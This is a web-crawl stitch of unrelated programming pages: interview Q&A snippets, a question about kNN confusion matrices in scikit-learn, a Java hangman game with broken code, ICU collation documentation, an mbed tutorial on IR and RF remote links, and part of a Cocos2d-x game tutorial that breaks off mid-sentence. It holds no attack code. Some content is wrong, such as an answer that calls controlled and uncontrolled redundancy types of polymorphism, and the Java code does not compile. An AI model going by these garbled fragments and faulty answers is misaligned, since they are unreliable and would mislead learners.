2345 IST */ #include #include void ... Can you use the function fprintf() to display the output on the screen? Helal - Jan 28th, 2016 Which function is used to display the output on the screen? veena - Dec 15th, 2006 yes we can #include <stdio.h>#include <conio.h>void main(){fprintf(stdout,"sdfsdf");getch();}fprintf() accepts the first argument which is a file pointer to a stream. the stdout is also a file pointer to the standard output(screen). Merits and demerits of friend function PRERNA - Nov 7th, 2015 - Provides additional functionality which is kept outside the class. - Provides functions that need data which is not normally used by the class. - Allows sharing private class information by a non member function. vadivel kumar - Sep 17th, 2015 It can access the member function of another class Are the variables argc and argv are local to main? yogesh kumar - Aug 21st, 2015 Can we change these argv and argc command line arguments ? laki.sreekanth - Jul 17th, 2010 Yes why because these variables written in main function only, not outside main. These belong to main block but not to other. So according to my knowledge these command line arguments are local to main. Controlled and uncontrolled redundancy What is the difference between controlled and uncontrolled redundancy? Illustrate with examples. Dhanalakshmi - Jul 19th, 2015 Both are the type of polymorphisms. Compile time polymorphism is controlled one. Dynamic is uncontrolled. Why we need to create object for final class and what are its benefits? Ahmed reda - Jun 29th, 2015 A final class cannot have any subclasses. This just means that nobody can create a subclass that modifies behaviour of the final class by modifying internal data or overriding methods so they behave d... Bimal Modak - Jan 14th, 2015 We can create the object of final class and this will act like any simple object created for simple class."java public final class BlockTest { public void testMethod(){ S... OOPS Interview Questions Ans
http://www.geekinterview.com/Interview-Questions/Concepts/OOPS
CC-MAIN-2018-13
en
refinedweb
I am newbie in Machine learning. Recently, I have learnt how to calculate confusion_matrix Test set KNN Classification confusion_matrix Training set KNN Classification confusion_matrix Training set KNN Classification confusion_matrix Test set # Split test and train data import numpy as np from sklearn.model_selection import train_test_split X = np.array(dataset.ix[:, 1:10]) y = np.array(dataset['benign_malignant']) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0) #Define Classifier from sklearn.neighbors import KNeighborsClassifier knn = KNeighborsClassifier(n_neighbors = 5, metric = 'minkowski', p = 2) knn.fit(X_train, y_train) # Predicting the Test set results y_pred = knn.predict(X_test) # Making the Confusion Matrix from sklearn.metrics import confusion_matrix cm = confusion_matrix(y_test, y_pred) # Calulate Confusion matrix for test set. confusion_matrix Training set k-fold cross-validation knn.fit(X_train, y_train) knn.fit(X_train, y_train) following code confusion_matrix training set # Applying k-fold Method from sklearn.cross_validation import StratifiedKFold kfold = 10 # no. of folds (better to have this at the start of the code) skf = StratifiedKFold(y, kfold, random_state = 0) # Stratified KFold: This first divides the data into k folds. Then it also makes sure that the distribution of the data in each fold follows the original input distribution # Note: in future versions of scikit.learn, this module will be fused with kfold skfind = [None]*len(skf) # indices cnt=0 for train_index in skf: skfind[cnt] = train_index cnt = cnt + 1 # skfind[i][0] -> train indices, skfind[i][1] -> test indices # Supervised Classification with k-fold Cross Validation from sklearn.metrics import confusion_matrix from sklearn.neighbors import KNeighborsClassifier conf_mat = np.zeros((2,2)) # Initializing the Confusion Matrix n_neighbors = 1; # better to have this at the start of the code # 10-fold Cross Validation for i in range(kfold): train_indices = skfind[i][0] test_indices = skfind[i][1] clf = [] clf = KNeighborsClassifier(n_neighbors = 5, metric = 'minkowski', p = 2) X_train = X[train_indices] y_train = y[train_indices] X_test = X[test_indices] y_test = y[test_indices] # fit Training set clf.fit(X_train,y_train) # predict Test data y_predcit_test = [] y_predict_test = clf.predict(X_test) # output is labels and not indices # Compute confusion matrix cm = [] cm = confusion_matrix(y_test,y_predict_test) print(cm) # conf_mat = conf_mat + cm You dont have to make much changes # Predicting the train set results y_train_pred = knn.predict(X_train) cm_train = confusion_matrix(y_train, y_train_pred) Here instead of using X_test we use X_train for classification and then we produce a classification matrix using the predicted classes for the training dataset and the actual classes. The idea behind a classification matrix is essentially to find out the number of classifications falling into four categories(if y is binary) - So as long as you have two sets - predicted and actual, you can create the confusion matrix. All you got to do is predict the classes, and use the actual classes to get the confusion matrix. EDIT In the cross validation part, you can add a line y_predict_train = clf.predict(X_train) to calculate the confusion matrix for each iteration. You can do this because in the loop, you initialize the clf everytime which basically means reseting your model. Also, in your code you are finding the confusion matrix each time but you are not storing it anywhere. At the end you'll be left with a cm of just the last test set.
https://codedump.io/share/nE7P2EmRtMwU/1/calculate-confusionmatrix-for-training-set
CC-MAIN-2018-13
en
refinedweb
IR 2.4Ghz. Cordless phones use 900Mhz, 2.4Ghz, and now 5.8Ghz. Key fobs, garage door openers, and some home automation systems use 315Mhz or 434Mhz. Since these devices are used in mass produced consumer products, these parts are widely available and relatively inexpensive. TV remotes use an Infrared LED Car key fobs use RF Using some low-cost parts and breakout boards that should only cost around US $10 per demo, two basic demos will be setup. One using IR and one with RF. Each demo has a transmitter and matched receiver attached to mbed. To keep it simple in each case, 8-bit ASCII character data will be sent out over the link and received back using mbed's serial port hardware. A terminal application running on the PC attached to mbed's USB virtual com port will be used to type in test data. The data will only appear back on the PC if the IR or RF communications link is operating correctly. Serial ports use a 10-bit protocol to transfer each character. The idle state of the serial TX pin is high. For bit 1, the start bit, the signal goes low. It is followed by the 8-bits of ASCII character data and a high stop bit (total of 10 bits). The rate at which bits change is called the baud rate. The low cost devices used in the demos will operate at 1200-2400 baud max(or bits per second (BPS) ). For the demo, both the transmitter and receiver are attached to mbed, but in a typical application they would be on different subsystem with its own processor, and physically separated by several meters. IR and RF communication links assembled on a breadboard for the demo. IR transmit and receive demo Consumer IR devices use an infrared LED in the handheld remote and an IR receiver located inside the device. Since sunlight and ambient room lighting would interfere with any IR detector just looking at light levels, the signal modulates (i.e. turns on and off) a high frequency carrier signal. This is called amplitude shift keying(ASK). Typically for IR, the frequency is in the 30-60Khz range with 38Khz being the most common carrier frequency. There are a few early first generation electronic ballasts for fluorescent lights operating this range that can cause interference with IR remotes, but in most cases it works well. This means that the IR LED transmitter must be modulated. On mbed, this can be done using the PWM hardware. The IR detector modules have a built-in bandpass filter and hardware to demodulate and recover the original signal. Sparkfun IR LED transmitter module The Sparkfun IR LED breakout board seen above contains a 50MA high output IR LED and a driver circuit using a transistor as seen in the schematic below. An IR Led can be used instead now that this board is no longer available, but the circuit still needs the correct polarity to control the LED on/off state, since the serial port's internal UART receiver hardware must have a low start bit and a high stop bit to work. A discrete IR LED should have an operating voltage of around 1.5V, so don't forget the series voltage dropping resistor! Schematic of IR LED breakout board Sparkfun IR receiver module The Sparkfun IR receiver breakout board seen above contains a Vishay TSOP853 38Khz IR receiver module. The block diagram is seen below. IR receiver module block diagram This newer 38Khz IR receiver module from Sparkfun should also work for the demo. Wiring Solder header pins into the breakout boards and everything will hookup on a breadboard. Point the IR LED towards the receiver breakout board. At a range of just a few inches the receiver can pickup the signal from the side, if case you have trouble pointing it directly towards the IR LED. Long right angle header pins might be a good idea on these IR breakout boards since they can then be mounted sticking up and directly facing each other. At close range, your hand or a piece of paper will reflect back enough IR to transmit the signal in case you can't mount them facing each other on the breadboard. IR Demo Code In the demo code, mbed's PWM hardware supplies the 38Khz carrier for transmission. The PWM period is set to 1/38000. The IR LED CTRL input is driven by the 38Khz PWM signal. IRLED = .5 generates a 50% PWM duty cycle to produce a 38Khz square wave for the carrier. The gnd pin on the IR LED is actually switched on and off using mbed's serial data output to eliminate the need for any external digital logic, and still permit direct use of the serial port hardware for 38Khz IR data transmission. It is a bit more complex than appears at first glance, since the start bit must be zero for the 10-bit serial port input hardware to work, and the IR receiver inverts the signal. IR_Demo #include "mbed.h" Serial pc(USBTX, USBRX); // tx, rx Serial device(p13, p14); // tx, rx DigitalOut myled1(LED1); DigitalOut myled2(LED2); PwmOut IRLED(p21); //IR send and receive demo //LED1 and LED2 indicate TX/RX activity //Character typed in PC terminal application sent out and returned back using IR transmitter and receiver int main() { //IR Transmit code IRLED.period(1.0/38000.0); IRLED = 0.5; //Drive IR LED data pin with 38Khz PWM Carrier //Drive IR LED gnd pin with serial TX device.baud(2400); while(1) { if(pc.readable()) { myled1 = 1; device.putc(pc.getc()); myled1 = 0; } //IR Receive code if(device.readable()) { myled2 = 1; pc.putc(device.getc()); myled2 = 0; } } } Import programIR_demo IR transmit and receive demo using Sparkfun breakout boards See Characters typed in PC terminal window echo back using the IR IR link, read back in on the serial port, and echoed back in the terminal application window. If the characters typed in do not appear in the window as they are typed, there is a problem with the IR link. LED1 and LED2 on mbed are used to indicate TX and RX activity. If you only see a few occasional errors, look around for a fluorescent light that might be causing interference. While running the demo if you happen to have an IR remote control handy, point it at the IR receiver and hit a button. Assuming that the IR remote uses a carrier near 38 KHz, you should see a random looking string of characters on the PC every time you hit a button. A Camera can detect the invisible IR light from an IR LED While you can't see the IR light from an IR LED with your eyes directly to see if it is working, it will show up on a webcam, digital camera, or a cell phone camera as a faint purple light as seen in the image on the right above. The IR LED is off in the left image. Unlike your eyes, the image sensors used in cameras have a slight response to IR light. Applications that need to transfer longer streams of data and not just 8-bit characters will need a bit more complex code for a different communications protocol. In most cases, shifting, some bit banging, and time delays will be needed since it will not be possible to use the serial transmission protocol implemented in hardware in mbed’s serial port UART. On mbed, a PWMOut pin can also be used to drive a low power IR LED directly or the CTL input on the IR breakout board. In this case, the IR LED breakout board power pins are tied to 5V and gnd, producing a bit more drive current for the LED than the demo setup. Set the period to 38Khz, assign the PWM output a value of 0.0 to turn it off (sends a "0" bit) , or a value of 0.5 to turn it on (sends a "1" bit a 38Khz square wave). In this case the serial port hardware would not be used at all, the software shifts out each bit. Each data bit would need to be shifted over, and masked off, and used to drive the PWM output pin after the appropriate time delay using wait(). Several cycles of the carrier frequency are required for the receiver to lock onto each bit and this sets the maximum data transfer rate (around 2400bPS). Consumer IR remotes send out a long continuous stream of bits (around 12-50 bits long) for each button, so the serial port cannot be used to send these codes (i.e., no start and stop bits for every eight bits of data). Universal remotes with learning have an IR detector and they learn by recording the bit pattern from the old IR remote control and then they play it back. For more information on consumer IR signals see and. Two cookbook projects, TxIR and IR remote provide additional insight into this approach and code examples for mbed. LIRC is a PC application designed to decode and send consumer IR signals. An extensive table of the IR formats and codes from LIRC used by different manufacturers can be found at and the table format is described at. The IR codes often contain preamble bits that help the receiver’s automatic gain control (AGC) circuit adjust the gain to the signal strength to minimize errors. IrDA is an infrared communications protocol designed to work at a range of around 1 meter. The IrDA IR signal is not modulated. It relies on high signal strength at a short distance to overcome interference from ambient light. It was a bit more popular in portable devices prior to the introduction of Wi-Fi and Bluetooth. It would require a different IR detector without a band pass filter and demodulator along with software to implement the complex protocols needed for data transfer. IrDA transceiver modules are available in packages similar to the IR receiver used in the demo with data rates from 115KbPS to 4000KbPS. RF transmit and receive demo RF remotes tend to cost a bit more, have longer range, and are not line of sight only as is the case for IR. Most car key fobs operate at 315Mhz or 434Mhz. Most key fob systems use encryption to prevent a car thief from intercepting and spoofing the codes.Rolling codes are used in most remotes to prevent simple “replay” devices from gaining access. Governments allocate and license the use of RF frequencies and place limits on power output, so frequencies used can vary from country to country. A final product with RF modules may require testing and certification. In the USA, many products using RF are required to have a label with an FCC ID number that can be searched to quickly determine the operating frequency of the device. Sparkfun RF transmitter module For the RF demo, the 315Mhz RF transmitter module seen above was used. It uses a surface acoustic wave (SAW) device. It is the metal can seen in the image above. A SAW device has significant performance, cost, and size advantages over the traditional quartz crystal for a fixed frequency transmitter. The RF transmitter’s 315 MHz carrier is turned on and off by the signal (ASK modulation). This is similar to the earlier IR example, but it is operating at a much higher frequency in the UHF range (315 MHz vs. 38 KHz). A similar pair of 434MHz modules is also available from Sparkfun and it is more common in Europe and Asia. The pins have the same function and the demo should also work for the 434MHz modules without changes (other than a shorter antenna length). Schematic of a SAW transmitter The schematic is hard to find for each module, but a typical SAW transmitter for this frequency range is shown above. Basically, it has a high frequency transistor, the SAW device for the correct frequency, and some RLCs. This looks identical to the circuit found on the back side of the Sparkfun module. Sparkfun RF receiver module The 315MHz Sparkfun RF receiver module seen above is used in the demo to receive the signal. These modules are also available from a number of other sources. Similar RF modules in small surface mount packages are also available, but a breakout board would be needed for use on a breadboard. The datasheets provide little information, but the module is basically a low-cost bare bones super-regenerative receiver. A super-regenerative receiver uses a minimum of parts and has a basic automatic gain control (AGC). An AGC attempts to automatically adjust the amplification (gain) needed to match the signal strength. A schematic for a 434MHz RF receiver module The datasheet does not include a schematic, but a schematic is shown above for another RF module in this frequency range and the same parts are found on the Sparkfun receiver module. A dual op amp, two high frequency transistors, some RLCs and a variable inductor with a screw slug for frequency tuning. For a more in depth discussion on how the various parts of this circuit function see. On the breadboard, a decoupling capacitor of 330uf was placed near the power pins of each module and it greatly reduced transmission errors. Some PCs also seem to have a bit more noise present on the USB 5V power lines than others and this can increase the RF transmission error rate and the need for decoupling capacitors. Each module has an antenna pin and a 6-13cm jumper wire works well as an antenna at short distances on a breadboard. At greater distances, the antenna would need to be longer (1/4 wave = 23cm (at 315MHz) is suggested). To get maximum range, don’t forget that a 1/4 wave monopole antenna is supposed to be sticking above (but not touching) a ground plane about the same size as the antenna. Earth approximates a ground plane, but metal provides more directional gain. The RF modules have a maximum range of up to 160M under perfect conditions. Some of the new surface mount RF modules mounted on breakouts have a range of a 1000M or more with a corresponding increase in price. Antenna size in a final product can also be reduced using several techniques. Wiring The RF modules have pins with spacing that fits in standard breadboards. Exercise some caution inserting the modules into the breadboard as they are not quite as sturdy as standard IC pins. The pins are also a bit smaller in size and on some breadboards they need to be adjusted a bit for a good clean contact. On this demo setup, the receiver had more errors until the module was pulled up a bit from the breadboard. Make certain that you hookup all of the power and ground pins. If the RF modules are placed too close on a breadboard, it can cause errors. In the demo setup, the metal can on the transmitter module was placed facing the receiver module to provide a bit of shielding. RF Demo Code In the RF demo, data is sent out over the serial port, transferred using the RF link, and read back in on the serial port. It seems straightforward, but to keep the transmitter and receiver locked on, the signal needs to be constantly changing. In the demo, the idle state constantly sends out a 10101010 pattern to keep the receiver locked on to the correct gain for the signal's strength. Without sending the sync pattern, if no change in data occurs for several ms, the receiver's AGC will start turning up the gain. Eventually, it cranks up the gain way up and outputs whatever RF noise it sees at the time (the digital data output appears almost to be random noise when this happens). RF_Demo #include "mbed.h" Serial pc(USBTX, USBRX); // tx, rx Serial device(p9, p10); // tx, rx DigitalOut myled1(LED1); DigitalOut myled2(LED2); //RF link demo using low-cost Sparkfun RF transmitter and receiver modules //LEDs indicate link activity //Characters typed in PC terminal windows will echo back using RF link int main() { char temp=0; device.baud(2400); while (1) { //RF Transmit Code if (pc.readable()==0) { myled1 = 1; //Send 10101010 pattern when idle to keep receivers AGC gain locked to transmitters signal //When receiver loses the signal lock (Around 10-30MS with no data change seen) it starts sending out noise device.putc(0xAA); myled1 = 0; } else //Send out the real data whenever a key is typed device.putc(pc.getc()); //RF Receive Code if (device.readable()) { myled2 = 1; temp=device.getc(); //Ignore Sync pattern and do not pass on to PC if (temp!=0xAA) pc.putc(temp); myled2 = 0; } } } Import programRF_loopback_test RF link test program using low cost modules from Sparkfun See Characters typed in PC terminal window echo back using the RF RF link, read back in on the serial port, and echoed back in the terminal application window. Keep in mind that any RF link will occasionally experience errors and is subject to interference from other RF sources nearby, cosmic radiation, and thunderstorms. If you happen to have a car key fob that operates at 315MHz (or 434Mhz in Europe and Asia), try holding it right next to the receiver antenna when running the demo and hit a button. Typically, you will see a long random looking string of characters when it generates and transmits the encrypted code for the button. If you disconnect power to the transmitter chip, the receiver's AGC will crank up the gain until it starts sending out the background RF noise converted to random strings of ASCII characters. The demo code leaves the transmitter turned on. Some applications may need to turn off the transmitter whenever it is not sending data out on the serial port. When the transmitter turns on, sending a preamble of 0xFF, 0xFF, 0x00, 0x55 and having the receiver wait for 0x55 only, prior to sending data will help the receiver's AGC lock onto the signal strength a bit faster. Instead of using the serial port hardware directly and constantly sending a sync character, bit banging and a different sync method or encoding scheme that always changes the data could be used. Two such common coding schemes are NRZ and Manchester coding. This type of receiver works best with an encoding scheme that has a DC level (average value) near zero (i.e. 50% "0"s and 50% "1"s in the digital signal). It is also possible to tune the receiver circuit to the transmitter by adjusting the screw on the receiver module, but they seem to be set very close at the factory and the tuning procedure is a bit involved. Tuning probably will be needed only if it is operating near the maximum range. receiver’s automatic gain control (AGC) slowly turning up the gain until the digital output starts to toggle from background noise whenever a signal is not present. Some designs disable the receiver output when RSSI falls below a fixed threshold (i.e., a squelch feature). One widely used IR and RF transmission protocol sends a preamble to lock in the AGC to the correct level followed by the data, and then the inverse of the data. This insures that the signal's DC level is always near zero to keep the AGC locked onto the signal. By checking each data byte against its inverse, errors can also be detected by the receiver. The disadvantage is that you lose half of the useable signal transmission bandwidth by sending the data bytes twice. Another wireless protocol sends the data three times and uses a majority vote to attempt to correct errors whenever a checksum or CRC error occurs on a packet of data. There is an mbed cookbook project using this transmitter module to send signals to the X10 home automation wireless receiver. These low cost IR and RF devices designed for remotes have limited bandwidth. If you need to transfer large amounts of data there are other wireless options to consider. A Wijit Smart AC Plug The Wijit is one of the newer low cost home automation examples. It has a Wi Fi hub that communcates to 10A relay controlled plug modules using a newer generation of 434Mhz RF receiver and transmitter modules similar to those used earlier. Information on the WiJit is a bit hard to find, but some details and internal photos from the FCC approval are at. They can be controlled from a free smart phone app. Additional Wireless Options These demos show just the basics of getting the communication channel operational. In the case of a handheld remote, if the signal is not received the user just hits the button again and perhaps moves closer. For applications that need more reliability, a bidirectional link would be required. One solution to support bidirectional communication is for each device to have a transmitter and receiver operating at a different frequency. Another possibility is to turn off the transmitter when it is not sending data. This requires a more complex protocol such as CSMA to solve the problems that would occur whenever two devices start to transmit at the same time. Being able to send data in both directions would allow each message to be acknowledged and checked for transmission errors using a checksum or CRC. In case of an error, it could automatically be retransmitted. Many of the higher data rate RF modules use frequency shift keying (FSK) instead of the simpler ASK for modulation. Similar to AM versus FM commercial radio broadcasts, having the signal change the frequency of the carrier signal provides more noise immunity than changing the amplitude, but it also requires a bit more hardware and power. More advanced wireless systems also have several channels at different frequencies and they automatically switch to an inactive channel to avoid conflicts. These techniques are required for reliable networking and many are built into the more complex and costly wireless communication standards and protocols such as WiFi, Bluetooth and Zigbee. In general, higher data rates, longer range, and higher reliability always adds to the power used, hardware cost, and software complexity. If you need higher data transfer rates and higher reliability, there are several wireless networking solutions available on breakout boards with mbed code examples in the wireless section of the mbed cookbook. These modules offer a drop-in solution and typically have a RF transceiver along with a microcontroler with firmware that implements the wireless protocol. Other wireless modules available on breakout boards shown below to consider for use with mbed and with mbed code examples are the RFM22B (128KbPS low-cost FSK transceiver), XBee (Zigbee), RN-42(Bluetooth) and the WiFly (WiFi) RFM22B (128KbPS low-cost FSK transceiver) XBee (Zigbee) RN-42(Bluetooth) WiFly (WiFi) Extending the Range on RF devices For longer range, more advanced antennas with high directional gain pointed in the correct direction can be used for stationary transmitters and receivers. The Wi Fi antenna seen below worked at 56Km using 200mw of RF power with a gain of 23.5 dBi. RF amplifiers can also be used to boost RF output and increase range, but check regulations and limitations in each country on RF output power. The 1000mw RF amplifier seen below can boost Wi Fi range to 12Km and has been used for remote control of UAVs. 2.4 GHz Grid Antenna with 23.5 dBi gain 1000mw 2.4 Ghz RF amplifier 4 comments on IR and RF remote controls: Please log in to post comments. Regarding Code for RF link module: I'm using 2 Microprocessors communicating using these RF link modules. Is the given code to program only one Microprocessor? If i'm using 2 microprocessors, one connected to Transmitter and pin 9 of mbed and the other microcontroller connected to reciever and pin 10 of the mbed, would the transmitter microcontroller only have the transmitter code and would the reciever microcontroller have the corresponding receiver code separately? Thank you very much for clarifying this. Regards.
https://os.mbed.com/users/4180_1/notebook/ir-and-rf-remote-controls/
CC-MAIN-2018-13
en
refinedweb
The UCollationElements API is used as an iterator to walk through each character of an international string. Use the iterator to return the ordering priority of the positioned character. The ordering priority of a character, which we refer to as a key, defines how a character is collated in the given collation object. For example, consider the following in Spanish: . "ca" -> the first key is key('c') and second key is key('a'). . "cha" -> the first key is key('ch') and second key is key('a').And in German, . "; . s=(UChar*)malloc(sizeof(UChar) * (strlen("This is a test")+1) ); . u_uastrcpy(s, "This is a test"); . coll = ucol_open(NULL, &success); . c = ucol_openElements(coll, str, u_strlen(str), &status); . order = ucol_next(c, &success); . ucol_reset(c); . order = ucol_prev(c, &success); . free(s); . ucol_close(coll); . ucol_closeElements(c); . }) on the same string are equivalent, if collation orders with the value UCOL_IGNORABLE are ignored. Character based on the comparison level of the collator. A collation order consists of primary order, secondary order and tertiary order. The data type of the collation order is t_int32. Definition in file ucoleitr.h. #include "unicode/utypes.h" #include "unicode/ucol.h" Go to the source code of this file.
http://icu.sourcearchive.com/documentation/4.4.1-1/ucoleitr_8h.html
CC-MAIN-2018-13
en
refinedweb
hey people.i am new to java and i am currently constructing a hangman game. the game asks for the user to enter a word(3 or more characters long). then it prompts the user to enter a single character or the complete word in a message input dialog which contains the word lenght replaced by ("_") .. if the user enters a single character then the dashes are replaced by the character the user enters.if the user enters the right word then a message box appears(correct). i am asking for help at the point where the user is prompt to enter a single character or a complete word.how am i going to reappear the inputdialog with the dashes replaced?how is going to check character by character of the hidden word?thx import javax.swing.*; public class StringGame { public String word; /** * Creates a new <code>StringGame</code> instance. * */ public StringGame() { } public static void main(String [] args){ StringGameFrame frame = new StringGameFrame(); frame.setVisible(true); StringGame game; game=new StringGame(); /** tot is the total amount of characters of a word typed of the user **/ String tot; tot=""; String tot2; tot2=""; char cha; /** the program asks from user to enter a word*/ String word=JOptionPane.showInputDialog(null,"Please enter a word."); String step1; /** check about word length.if it is equal or less than 2, user is prompted to re-enter a valid word*/ if ((word.length()<=2)){ do{ step1= JOptionPane.showInputDialog(null,"Please enter a word with 3 or more characters."); }while((step1.length()<=2)); word=step1; } for (int i=1; i<=word.length() ; i++){ tot= tot + "_ "; } String step2=JOptionPane.showInputDialog(null,tot + "\nPlease enter a single character, or a word as your final guess."); if (step2.length()<=1){ // !!!!!! FAULTY PART !!!!! for (int i=0;i<=word.length(); i++){ cha=word.charAt[i]; if (cha.equals(step2)) { tot2= tot2 + step2; } else{ tot2=tot2 + "_ "; } } } else { if (step2.equals(word)){ JOptionPane.showMessageDialog(null,"You guessed correctly"); } else { JOptionPane.showMessageDialog(null,"You guessed incorrectly"); } } } }
https://www.daniweb.com/programming/software-development/threads/238501/hangman-help
CC-MAIN-2018-13
en
refinedweb
Cocos2d-x Tutorial for Beginners Cocos2d-x is a fast, powerful, and easy-to-use open source 2D game engine. It’s is very similar to Apple’s Sprite Kit, but has one key advantage – Cocos2d-x is cross platform. This means with one set of code, you can make games for iOS, Android, Windows Phone, Mac OS X, Windows Desktop and Linux. This is huge for indie game devs! In this tutorial, you will learn how to create a simple 2D game in Cocos2d-x with C++. And yes — there will be ninjas! :] Getting Started Download the latest version of Cocos2d-x at; this tutorial used version 3.5. Place the downloaded file wheres you’d like to store your Cocos2d-x installation, such as in your home directory, then unzip it. Open Terminal and cd into the folder you just extracted. For example, if you placed the project in your home directory, run the following command: cd ~/cocos2d-x-3.5/ Now run the following command: python setup.py This sets up the necessary shell environment variables. When it prompts you to configure the Android-specific variables NDK_ROOT, ANDROID_SDK_ROOT and ANT_ROOT, just press Enter three times to finish the configuration. pythonon the command line and it will display the version (then hit Ctrl-D to exit). If you have an older version of Python, install the latest version of Python at python.org. As you can see in the following screenshot, the script instructs you to execute another command to complete the setup: Enter the command as the script’s output instructed. A great timesaving tip: you can use a tilde (~) in place of /Users/your_user_name, so to save keystrokes you could type the following: source ~/.zshrc (or source ~/.bash_profile) The command you entered simply re-processes your shell configuration and gives it access to the new variables. Now you can call the cocos command in Terminal from any directory. Run the following command to create a C++ game template named SimpleGame: cocos new -l cpp -d ~/Cocos2d-x-Tutorial SimpleGame This creates a directory named Cocos2d-x-Tutorial in your home directory, and inside that, a sub-directory named SimpleGame that contains your project’s files. Note: To learn about the available cocos subcommands, type cocos --help or cocos -h. You can also learn about any subcommand’s options by appending “--help” or “-h”, such as cocos new -h to see the options for the new command. Double-click ~/Cocos2d-x-Tutorial/SimpleGame/proj.ios_mac/SimpleGame.xcodeproj in Finder to open the project in Xcode. Once you’re Inside Xcode, ensure that SimpleGame Mac is the active scheme, as shown below: While Cocos2d-x is capable of building games for many platforms, in this tutorial you’ll focus on making an OS X app. Porting this project to other platforms is a trivial (yes, trivial!) matter discussed briefly at the end of this tutorial. Build and run your app to see the template project in all its glory: Resolution Setup By default, Cocos2d-x games are named “MyGame” and have a resolution of 960×640, but those details are easy to change. Open AppDelegate.cpp and find the following line inside AppDelegate::applicationDidFinishLaunching: glview = GLViewImpl::create("My Game"); Replace that line with the following code: glview = GLViewImpl::createWithRect("SimpleGame", Rect(0,0, 480, 320), 1.0); This changes the app’s name to “SimpleGame” and sets its resolution to 480×320 to match the background art included with the template. Build and run your app again to see your new, smaller game: Notice the third argument you passed to createWithRect — 1.0. This parameter scales the frame, which is usually \used for testing resolutions larger than your monitor. For example, to test a 1920×1080 resolution on a monitor smaller than 1920×1080, you could pass 0.5 to scale the window to 960×540. While this call to createWithRect changes the game’s frame on desktops, it doesn’t work this way on iOS devices; instead, the game’s resolution matches the screen size. Here is how it looks on an iPhone 6: So how do you handle multiple resolutions? In this tutorial, you’ll create a single set of game resources based on a 960×640 resolution, then simply scale the assets up or down as necessary at runtime. To implement this, add the following code inside AppDelegate::applicationDidFinishLaunching, just above the line that calls setDisplayStats on director: // 1 Size designSize = Size(480,320); Size resourceSize = Size(960,640); // 2 director->setContentScaleFactor(resourceSize.height / designSize.height); director->getOpenGLView()->setDesignResolutionSize( designSize.width, designSize.height, ResolutionPolicy::FIXED_HEIGHT); Here’s what the code above does: - Here you define designSize– the size you’re using when creating your game logic – and resourceSize– the size on which all your art assets are based. - These lines tell your game’s Directorto scale the assets as necessary based on the design and resource sizes you provided. For a detailed explanation of how Cocos2d-x handles resolutions, please refer to the Cocos2d-x wiki entry on Multi-resolution adaptation. Adding a Sprite Next, download the resources file for this project and unzip it to a convenient location. Select all the files in the SimpleGameResources folder you just extracted and drag them into the Resources group in your Xcode project. In the dialog that appears, be sure to check Copy items if needed, SimpleGame iOS and SimpleGame Mac before clicking Finish: Next open HelloWorldScene.h add the following line just after the line that includes cocos2d.h: using namespace cocos2d; This specifies you’ll be using the cocos2d namespace; this lets you do things like write Sprite* instead of cocos2d::Sprite*. It’s not absolutely necessary, but it certainly makes development more pleasant. :] Now you’ll need a private member variable to point to your player sprite. Add the following code to the HelloWorld declaration: private: Sprite* _player; Next, open HelloWorldScene.cpp and replace the contents of the HelloWorld::init method with the following: // 1 if ( !Layer::init() ) { return false; } // 2 auto origin = Director::getInstance()->getVisibleOrigin(); auto winSize = Director::getInstance()->getVisibleSize(); // 3 auto background = DrawNode::create(); background->drawSolidRect(origin, winSize, Color4F(0.6,0.6,0.6,1.0)); this->addChild(background); // 4 _player = Sprite::create("player.png"); _player->setPosition(Vec2(winSize.width * 0.1, winSize.height * 0.5)); this->addChild(_player); return true; Here’s the play-by-play of this method: - First you call the super class’s initmethod. Only if this succeeds do you proceed with HelloWorldScene‘s setup. - You then get the window’s bounds using the game’s Directorsingleton. - You then create a DrawNodeto draw a gray rectangle that fills the screen and add it to the scene. This serves as your game’s background. - Finally, you create the player sprite by passing in the image’s name. You position it 10% from the left edge of the screen, centered vertically, and add it to the scene. Build and run your app; voila, ladies and gentlemen, the ninja has entered the building! :] Moving Monsters Your ninja needs a purpose in life, so you’ll add some monsters to your scene for your ninja to fight. To make things more interesting, you want the monsters to move around – otherwise, it wouldn’t prove to be much of a challenge! You’ll create the monsters slightly off-screen to the right, and set up an action for them telling them to move to the left. First, open HelloWorldScene.h and add the following method declaration: void addMonster(float dt); Then add the following method implementation inside HelloWorldScene.cpp: void HelloWorld::addMonster(float dt) { auto monster = Sprite::create("monster.png"); // 1 auto monsterContentSize = monster->getContentSize(); auto selfContentSize = this->getContentSize(); int minY = monsterContentSize.height/2; int maxY = selfContentSize.height - monsterContentSize.height/2; int rangeY = maxY - minY; int randomY = (rand() % rangeY) + minY; monster->setPosition(Vec2(selfContentSize.width + monsterContentSize.width/2, randomY)); this->addChild(monster); // 2 int minDuration = 2.0; int maxDuration = 4.0; int rangeDuration = maxDuration - minDuration; int randomDuration = (rand() % rangeDuration) + minDuration; // 3 auto actionMove = MoveTo::create(randomDuration, Vec2(-monsterContentSize.width/2, randomY)); auto actionRemove = RemoveSelf::create(); monster->runAction(Sequence::create(actionMove,actionRemove, nullptr)); } It’s relatively straightforward, but here’s what the above code does: - The first part of this method is similar to what you did earlier with the player: it creates a monster sprite and places it just offscreen to the right. It sets its y-position to a random value to keep things interesting. - Next, the method calculates a random duration between two and four seconds for the action it’s about to add to the monster. Each monster will move the same distance across the screen, so varying the duration results in monsters with random speeds. - Finally, the method creates an action that moves the monster across the screen from right to left and instructs the monster to run it. This is explained in more detail below. Cocos2d-x provides lots of extremely handy built-in actions that help you easily change the state of sprites over time, including move actions, rotate actions, fade actions, animation actions, and more. Here you use three actions on the monster: MoveTo: Moves an object from one point to another over a specific amount of time. RemoveSelf: Removes a node from its parent, effectively “deleting it” from the scene. In this case, you use this action to remove the monster from the scene when it is no longer visible. This is important because otherwise you’d have an endless supply of monsters and would eventually consume all your device’s resources. Sequence: Lets you perform a series of other actions in order, one at a time. This means you can have the monster move across the scene and remove itself from the screen when it reaches its destination. There’s one last thing to do before you let you ninja go to town — you need to actually call the method to create monsters! Just to make things fun, you’ll create monsters that spawn continuously. Simply add the following code to the end of HelloWorld::init, just before the return statement: srand((unsigned int)time(nullptr)); this->schedule(schedule_selector(HelloWorld::addMonster), 1.5); srand((unsigned int)time(nullptr)); seeds the random number generator. If you didn’t do this, your random numbers would be the same every time you ran the app. That wouldn’t feel very random, would it? :] You then pass HelloWorld::addMonster into the schedule method, which will call addMonster() every 1.5 seconds. Here Cocos2d-x takes advantage of C++’s pointers to member functions. If you don’t understand how this works, please refer to ioscpp for more information. That’s it! Build and run your project; you should now see monsters happily (or angrily, as the case may be!) moving across the screen: Shooting Projectiles Your brave little ninja needs 